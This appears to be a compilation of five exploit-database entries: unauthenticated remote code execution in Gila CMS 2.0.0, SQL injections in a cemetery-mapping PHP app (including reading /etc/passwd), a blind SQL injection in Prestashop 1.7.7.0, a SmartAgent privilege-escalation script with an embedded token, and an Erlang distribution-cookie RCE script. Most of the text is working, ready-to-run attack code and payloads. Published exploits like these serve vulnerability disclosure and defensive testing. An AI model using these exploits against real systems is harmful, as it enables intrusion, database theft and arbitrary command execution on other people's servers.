# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) # Date: 1.12.2021 # Exploit Author: Enesdex # Vendor Homepage: https://gilacms.com/ # Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0 # Version: x < 2.0.0 # Tested on: Windows 10 import requests import time target_url = "http://192.168.1.101:80/Gila/" cmd = "calc.exe" url = target_url+"?c=admin" cookies = {"GSESSIONID": "../../index.php"} headers = {"User-Agent": "<?php shell_exec('"+cmd+"'); include 'src\\core\\bootstrap.php'; ?>"} requests.get(url, headers=headers, cookies=cookies) time.sleep(5) requests.get(target_url+"/index.php")

# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple SQL Injections # Exploit Author: Mesut Cetin # Date: 2021-01-12 # Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code # Affected Version: 1.0 # Vulnerable parameter: "Search" bar (POST method) # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 SQL Injection is a type of an injection attack that makes it possible to execute malicious SQL statements. Due to unsanitized user input, the attacker can retrieve the entire SQL database in this case. Explanation: The function "person.php" takes user input through the search bar at line 45: "$_POST['search']" and uses it without any sanitization for the following SQL statement (line 46-49): $sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'"; $mydb->setQuery($sql); $cur = $mydb->executeQuery(); $numrows = $mydb->num_rows($cur);//get the number of count A single quote (') at the search bar under http://localhost/CemeteryMapping/index.php?q=person will result in SQL synthax errors. Proof of Concept: Since the php code lacks of sanitization of the user input, multiple SQL injection queries can be found. 1. Boolean-based SQL injection POST request the page /CemeteryMapping/index.php?q=person and use as payload: ' or 1=1 -- search=' or 1=1 -- 2. Union-based SQL injection To retrieve sensitive files like /etc/passwd, use the following payload at the search bar (POST request http://localhost/CemeteryMapping/index.php?q=person): search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- - If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL commands: @@hostname : Current Hostname @@tmpdir : Temp Directory @@datadir : Data Directory @@version : Version of DB @@basedir : Base Directory user() : Current User database() : Current Database version() : Version schema() : current Database UUID() : System UUID key current_user() : Current User current_user : Current User system_user() : Current System user session_user() : Session user @@GLOBAL.have_symlink : Check if Symlink is enabled or disabled @@GLOBAL.have_ssl : Check if it have SSL or not 3. Time-based SQL injection For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- - Mitigation: By using prepared statements and parameterized queries, the SQL injection can be prevented.

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection # Date: 08-01-2021 # Exploit Author: Jaimin Gondaliya # Vendor Homepage: https://www.prestashop.com # Software Link: https://www.prestashop.com/en/download # Version: Prestashop CMS - 1.7.7.0 # Tested on: Windows 10 Parameter: id_product Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt) Exploit: http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)

# Exploit Title: SmartAgent 3.1.0 - Privilege Escalation # Date: 01-11-2021 # Exploit Author: Orion Hridoy # Vendor Homepage: https://www.smartagent.io/ # Version: Build 3.1.0 # Tested on: Windows 10/Kali Linux A Low grade user like ViewOnly can create an account with SuperUser permission. Steps To Reproduce: 1. Create a user with ViewOnly 2. Visit https://demo.localhost.com/#/CampaignManager/users 3. Now you will be able to create an account with SuperUser. #Python Exploit [Replace With Your Authorization Code] import requests session = requests.Session() rawBody = "{\"username\":\"[email protected] \",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}" headers = {"Authorization":"[email protected],engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"https://demo.localhost.com/","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Content-Type":"application/json"} response = session.post("https://demo.localhost.com/api/createUser", data=rawBody, headers=headers) print("User Created With\nUser: [email protected]\nPass: Orionhridoy69")

# Exploit Title: Erlang Cookie - Remote Code Execution # Date: 2020-05-04 # Exploit Author: 1F98D # Original Author: Milton Valencia (wetw0rk) # Software Link: https://www.erlang.org/ # Version: N/A # Tested on: Debian 9.11 (x64) # References: # https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ # # Erlang allows distributed Erlang instances to connect and remotely execute commands. # Nodes are permitted to connect to eachother if they share an authentication cookie, # this cookie is commonly called ".erlang.cookie" # #!/usr/local/bin/python3 import socket from hashlib import md5 import struct import sys TARGET = "192.168.1.1" PORT = 25672 COOKIE = "XXXXXXXXXXXXXXXXXXXX" CMD = "whoami" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET, PORT)) name_msg = b"\x00" name_msg += b"\x15" name_msg += b"n" name_msg += b"\x00\x07" name_msg += b"\x00\x03\x49\x9c" name_msg += b"AAAAAA@AAAAAAA" s.send(name_msg) s.recv(5) # Receive "ok" message challenge = s.recv(1024) # Receive "challenge" message challenge = struct.unpack(">I", challenge[9:13])[0] print("Extracted challenge: {}".format(challenge)) challenge_reply = b"\x00\x15" challenge_reply += b"r" challenge_reply += b"\x01\x02\x03\x04" challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest() s.send(challenge_reply) challenge_res = s.recv(1024) if len(challenge_res) == 0: print("Authentication failed, exiting") sys.exit(1) print("Authentication successful") ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex" msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k' msg += struct.pack(">H", len(CMD)) msg += bytes(CMD, 'ascii') msg += b'jw\x04user' payload = b'\x70' + ctrl + msg payload = struct.pack('!I', len(payload)) + payload print("Sending cmd: '{}'".format(CMD)) s.send(payload) print(s.recv(1024))